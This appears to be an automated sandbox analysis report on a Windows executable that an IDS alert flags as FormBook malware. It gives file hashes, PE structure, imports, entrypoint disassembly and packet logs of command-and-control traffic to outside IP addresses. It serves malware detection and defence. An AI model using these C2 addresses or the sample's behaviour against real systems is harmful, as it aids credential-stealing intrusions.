O627XL0I15O627XL0I15O6

C:\Users\user\AppData\Local\Temp\underbalanced

Download File

Process:	C:\Users\user\Desktop\rACq8Eaix6.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992759758340631
Encrypted:	true
SSDEEP:	6144:XQazfW8JrZXxLt0Y6Wna2K2E7HU4wlWzPUYKT7gLbti:XFzLJZXxTnTA0ADU/T74i
MD5:	621CCD2885F0CE400775A114A5ECB10F
SHA1:	51E8605CE22D018FD4B628A0E539343866CD153B
SHA-256:	9113137FE5486988CA18DBE2946F4A00501390DEA36D1BB22F220CE62C5B02E3
SHA-512:	5437D6E603E884CF1144C6D4558F75B0FDF1E0A650AC546F0959F61EDD124C923211115A2A75405F57DC624A4C90430DD3497C1D119A54B354FEFD408D239C11
Malicious:	false
Preview:	.m.L3I15K627..0I.5O627XLpI15O627XL0I15O627XL0I15O627XL0I15O6.7XL>V.;O.;.y.1....^[Dx<B&VG.[.T9"^&E.-S.E-". _..ya.5#T,.8B<.7XL0I1567;.e,W..U(..W?.*..uVU.B..U(.(...)V.._Q_e,W.15O627XL`.15.737n...15O627XL.I34D797X.4I15O627XLp\15O&27X<4I15.62'XL0K15I627XL0I75O627XL0955O427XL0I35..27HL0Y15O6"7X\0I15O6"7XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627v8U1E5O66e\L0Y15Ob67X\0I15O627XL0I15o62WXL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O627XL0I15O6

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.207988396181001
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rACq8Eaix6.exe
File size:	1'225'216 bytes
MD5:	e3779c9167a86c1cad7bd494bb7fd15a
SHA1:	5d4498e08c39e028505c14e93a8f2cb371326088
SHA256:	004b01b19e0225e92388a04d9792240192952ef47f40679b71fbe6de33982f11
SHA512:	09df82f6ea0b10f2f65e1a79177ee16f9a2f17604c3a720858657fc07c6aa39687cf0a26a42507c26d3b0d494190ef840eca49f8fd6fdc76a56d24d6b5a91706
SSDEEP:	24576:/u6J33O0c+JY5UZ+XC0kGso6FaWl4IxfaUvOS82LkI7ZzaWY:Ju0c++OCvkGs9FaWHvOSZLkIjY
TLSH:	3A45CF22B3DDC360CB669173BF69B7056EBF3C614630B85B2F980D7DA950162162C7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67518E96 [Thu Dec 5 11:29:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F05989D137Ah
jmp 00007F05989C4144h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F05989C42CAh
cmp edi, eax
jc 00007F05989C462Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F05989C42C9h
rep movsb
jmp 00007F05989C45DCh
cmp ecx, 00000080h
jc 00007F05989C4494h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F05989C42D0h
bt dword ptr [004BE324h], 01h
jc 00007F05989C47A0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F05989C446Dh
test edi, 00000003h
jne 00007F05989C447Eh
test esi, 00000003h
jne 00007F05989C445Dh
bt edi, 02h
jnc 00007F05989C42CFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F05989C42D3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F05989C4325h
bt esi, 03h
jnc 00007F05989C4378h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x628ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12a000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x628ec	0x62a00	9e1d09f56da0bb02354b457bd6448cb3	False	0.9333313529784537	data	7.906440020415821	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12a000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x59bb3	data			1.000329216763391
RT_GROUP_ICON	0x12936c	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x1293e4	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1293f8	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12940c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x129420	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1294fc	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T07:59:18.075729+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.5	49979	104.18.73.116	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 07:59:01.606524944 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:01.611385107 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:01.611470938 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:01.621920109 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:01.626753092 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363516092 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363537073 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363552094 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363564968 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363579035 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363601923 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363615990 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363630056 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363643885 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363656998 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.363711119 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.363749981 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.368688107 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.368712902 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.368822098 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.487736940 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.487763882 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.487782955 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.487885952 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.487900019 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.487911940 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.488037109 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.488082886 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488101959 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488117933 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488151073 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.488174915 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.488506079 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488523006 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488539934 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488573074 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.488604069 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488622904 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.488655090 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.489362001 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.489388943 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.489404917 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.489418983 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.489419937 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.489439011 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.489448071 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.489490032 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.490283012 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.490299940 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.490319967 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:02.490395069 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.526499033 CET	49969	80	192.168.2.5	90.156.201.74
Jan 11, 2025 07:59:02.531585932 CET	80	49969	90.156.201.74	192.168.2.5
Jan 11, 2025 07:59:17.595613003 CET	49979	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:17.600426912 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:17.600523949 CET	49979	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:17.612359047 CET	49979	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:17.617201090 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.075660944 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.075676918 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.075687885 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.075699091 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.075711012 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.075721979 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.075728893 CET	49979	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:18.075784922 CET	49979	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:18.076021910 CET	80	49979	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:18.076081991 CET	49979	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:19.115436077 CET	49979	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:20.324450016 CET	49980	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:20.329266071 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.329344988 CET	49980	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:20.347218037 CET	49980	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:20.352133036 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.786860943 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.786873102 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.786884069 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.786895037 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.786906004 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.786916971 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.786926031 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.787007093 CET	49980	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:20.787045956 CET	49980	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:20.787538052 CET	80	49980	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:20.787591934 CET	49980	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:21.849807024 CET	49980	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:22.868431091 CET	49981	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:22.873255968 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:22.873358965 CET	49981	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:22.889841080 CET	49981	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:22.894710064 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:22.894860029 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:23.341720104 CET	80	49981	104.18.73.116	192.168.2.5
